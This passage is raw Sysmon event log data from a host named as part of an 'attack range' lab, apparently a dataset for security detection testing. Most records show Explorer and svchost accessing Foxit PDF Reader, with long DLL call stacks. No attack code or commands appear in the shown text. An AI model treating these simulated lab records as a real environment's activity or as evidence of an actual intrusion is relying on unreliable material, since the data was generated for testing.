ll+e20c3(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64) 10341000x800000000000000039466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1939d9(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e1d2b(wow64)|C:\Windows\System32\ieframe.dll+e16f6(wow64)|C:\Windows\System32\ieframe.dll+20d9ae(wow64)|C:\Windows\System32\ieframe.dll+e1367(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64) 10341000x800000000000000039465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19395a(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e1d2b(wow64)|C:\Windows\System32\ieframe.dll+e16f6(wow64)|C:\Windows\System32\ieframe.dll+20d9ae(wow64)|C:\Windows\System32\ieframe.dll+e1367(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64) 10341000x800000000000000039464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e1d2b(wow64)|C:\Windows\System32\ieframe.dll+e16f6(wow64)|C:\Windows\System32\ieframe.dll+20d9ae(wow64)|C:\Windows\System32\ieframe.dll+e1367(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64) 10341000x800000000000000039463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e1d2b(wow64)|C:\Windows\System32\ieframe.dll+e16f6(wow64)|C:\Windows\System32\ieframe.dll+20d9ae(wow64)|C:\Windows\System32\ieframe.dll+e1367(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64) 10341000x800000000000000039462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1939d9(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e1c6f(wow64)|C:\Windows\System32\ieframe.dll+e16f6(wow64)|C:\Windows\System32\ieframe.dll+20d9ae(wow64)|C:\Windows\System32\ieframe.dll+e1367(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64) 10341000x800000000000000039461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19395a(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e1c6f(wow64)|C:\Windows\System32\ieframe.dll+e16f6(wow64)|C:\Windows\System32\ieframe.dll+20d9ae(wow64)|C:\Windows\System32\ieframe.dll+e1367(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64) 10341000x800000000000000039460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e1c6f(wow64)|C:\Windows\System32\ieframe.dll+e16f6(wow64)|C:\Windows\System32\ieframe.dll+20d9ae(wow64)|C:\Windows\System32\ieframe.dll+e1367(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64) 10341000x800000000000000039459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e1c6f(wow64)|C:\Windows\System32\ieframe.dll+e16f6(wow64)|C:\Windows\System32\ieframe.dll+20d9ae(wow64)|C:\Windows\System32\ieframe.dll+e1367(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64) 10341000x800000000000000039458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1939d9(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e1c6f(wow64)|C:\Windows\System32\ieframe.dll+e1e17(wow64)|C:\Windows\System32\ieframe.dll+e13fe(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64)|C:\Windows\System32\ieframe.dll+19fe1c(wow64) 10341000x800000000000000039457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19395a(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e1c6f(wow64)|C:\Windows\System32\ieframe.dll+e1e17(wow64)|C:\Windows\System32\ieframe.dll+e13fe(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64)|C:\Windows\System32\ieframe.dll+19fe1c(wow64) 10341000x800000000000000039456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e1c6f(wow64)|C:\Windows\System32\ieframe.dll+e1e17(wow64)|C:\Windows\System32\ieframe.dll+e13fe(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64) 10341000x800000000000000039455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e1c6f(wow64)|C:\Windows\System32\ieframe.dll+e1e17(wow64)|C:\Windows\System32\ieframe.dll+e13fe(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64) 10341000x800000000000000039454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\SHELL32.dll+130450(wow64)|C:\Windows\System32\SHELL32.dll+19361f(wow64)|C:\Windows\System32\ieframe.dll+e1c6f(wow64)|C:\Windows\System32\ieframe.dll+e1e17(wow64)|C:\Windows\System32\ieframe.dll+e13fe(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64) 10341000x800000000000000039453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130442(wow64)|C:\Windows\System32\SHELL32.dll+19361f(wow64)|C:\Windows\System32\ieframe.dll+e1c6f(wow64)|C:\Windows\System32\ieframe.dll+e1e17(wow64)|C:\Windows\System32\ieframe.dll+e13fe(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64) 10341000x800000000000000039452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.952{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130442(wow64)|C:\Windows\System32\SHELL32.dll+19361f(wow64)|C:\Windows\System32\ieframe.dll+e1c6f(wow64)|C:\Windows\System32\ieframe.dll+e1e17(wow64)|C:\Windows\System32\ieframe.dll+e13fe(wow64)|C:\Windows\System32\ieframe.dll+e1934(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64) 10341000x800000000000000039451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.851{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.851{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.851{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.250{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Start\en-US\history\history.jsonMD5=C515A6B2834FD60FCC8A39BEC43AA234,SHA256=D3944D967B207D69414BA10D17309B1BA04515E36D3DA5655F9A7B469C029391,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.250{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.250{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF 